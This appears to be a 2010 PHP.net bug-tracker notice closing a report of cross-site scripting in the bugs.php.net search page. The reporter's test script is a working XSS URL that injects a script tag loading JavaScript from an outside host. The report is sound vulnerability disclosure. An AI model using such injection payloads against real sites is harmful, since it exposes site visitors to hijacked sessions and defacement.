Bug #51722 [Opn->Csd]: Cross Site Scripting Vulnerability on Bug Tracking Site
| From: | derick@php.net | Date: | Sun, 02 May 2010 22:13:09 +0000 |
| Subject: | Bug #51722 [Opn->Csd]: Cross Site Scripting Vulnerability on Bug Tracking Site | ||
| References: | 1 | Groups: | php.webmaster |
| Request: | Send a blank email to php-webmaster+get-8075@lists.php.net to get a copy of this message | ||
Edit report at http://bugs.php.net/bug.php?id=51722&edit=1
ID: 51722
Updated by: derick@php.net
Reported by: tedivm at tedivm dot com
Summary: Cross Site Scripting Vulnerability on Bug Tracking Site
-Status: Open
+Status: Closed
Type: Bug
Package: Website problem
PHP Version: Irrelevant
-Assigned To:
+Assigned To: derick
New Comment:
This bug has been fixed in SVN. Since the websites are not directly
updated from the SVN server, the fix might need some time to spread
across the globe to all mirror sites, including PHP.net itself.
Thank you for the report, and for helping us make PHP.net better.
Thanks for the report!
Previous Comments:
------------------------------------------------------------------------
[2010-05-03 00:12:51] derick@php.net
Automatic comment from SVN on behalf of derick
Revision: http://svn.php.net/viewvc/?view=revision&revision=298885
Log: - Fixed bug #51722.
------------------------------------------------------------------------
[2010-05-02 23:25:34] tedivm at tedivm dot com
Description:
------------
The bugs.php.net search engine does not sanitize it's input, thus
allowing an xss
attack.
The vulnerability has been posted on a blog and reposted on Reddit
(http://www.reddit.com/r/netsec/comments/bz4fw/php_website_xss_defacement/),
but
since I didn't see a bug report for it and it's
still active I'm assuming it hasn't been picked up by you guys.
Test script:
---------------
http://bugs.php.net/search.php?cmd=display&search_for=&php_os=&php_os_not=&author_email=&bug_type=&boolean=0&bug_age=%22%3E%3Cscript%20src=%22http://www.yourjavascript.com/38310202111/xss.js%22%20/%3E%3C&bug_updated=0&order_by=id&direction=DESC&limit=30&phpver=&assign=&status=Open&begin=0
Expected result:
----------------
I expect the injected javascript not to run.
Actual result:
--------------
The injected javascript runs.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/bug.php?id=51722&edit=1